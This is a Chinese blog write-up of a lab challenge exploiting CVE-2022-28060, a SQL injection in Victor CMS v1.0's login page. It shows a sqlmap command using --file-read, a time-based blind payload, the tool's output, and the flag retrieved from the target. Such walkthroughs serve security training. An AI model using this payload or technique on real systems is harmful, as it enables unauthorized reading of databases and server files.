春秋云镜 - CVE-2022-28060
Victor CMS v1.0 /includes/login.php 存在sql注入
找到页面的登录框,看介绍应该是post类型的表单注入。
上sqlmap用原本的梭发现ctf的那个表是空的,换用--file-read参数从目标中读取文件拿到flag。
root@Lockly temp/tmp » sqlmap -r sql.txt --file-read "/flag" --batch ___ __H__ ___ ___["]_____ ___ ___ {1.7.9#stable} |_ -| . [)] | .'| . | |___|_ [.]_|_|_|__,| _| |_|V... |_| https://sqlmap.org [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 15:08:44 /2023-09-22/ [15:08:44] [INFO] parsing HTTP request from 'sql.txt' [15:08:46] [WARNING] provided value for parameter 'login' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly [15:08:46] [INFO] resuming back-end DBMS 'mysql' [15:08:46] [INFO] testing connection to the target URL sqlmap resumed the following injection point(s) from stored session: --- Parameter: user_name (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: user_name=admin' AND (SELECT 4341 FROM (SELECT(SLEEP(5)))fdPd) AND 'Winx'='Winx&user_password=123455&login= --- [15:08:47] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 [15:08:47] [INFO] fingerprinting the back-end DBMS operating system [15:08:51] [INFO] the back-end DBMS operating system is Linux [15:08:51] [INFO] fetching file: '/flag' [15:08:51] [INFO] retrieved: [15:08:51] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y 6 [15:09:22] [INFO] adjusting time delay to 1 second due to good response times 66C61677B65613836376236362D353139332D346636642D623765302D6437643634386531643139647D do you want confirmation that the remote file '/flag' has been successfully downloaded from the back-end DBMS file system? [Y/n] Y [15:16:02] [INFO] retrieved: 42 [15:16:10] [INFO] the local file '/root/.local/share/sqlmap/output/eci-2ze08w8zjen5myy23f06.cloudeci1.ichunqiu.com/files/_flag' and the remote file '/flag' have the same size (42 B) files saved to [1]: [*] /root/.local/share/sqlmap/output/eci-2ze08w8zjen5myy23f06.cloudeci1.ichunqiu.com/files/_flag (same file) [15:16:10] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/eci-2ze08w8zjen5myy23f06.cloudeci1.ichunqiu.com' [*] ending @ 15:16:10 /2023-09-22/ root@Lockly temp/tmp » cat /root/.local/share/sqlmap/output/eci-2ze08w8zjen5myy23f06.cloudeci1.ichunqiu.com/files/_flag flag{ea867b66-5193-4f6d-b7e0-d7d648e1d19d}# root@Lockly temp/tmp »
本文作者:lockly
本文链接:https://www.cnblogs.com/bktown/p/17722472.html
版权声明:本作品采用知识共享署名-非商业性使用-禁止演绎 2.5 中国大陆许可协议进行许可。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 单线程的Redis速度为什么快?
· 展开说说关于C#中ORM框架的用法!
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库
· SQL Server 2025 AI相关能力初探
· 为什么 退出登录 或 修改密码 无法使 token 失效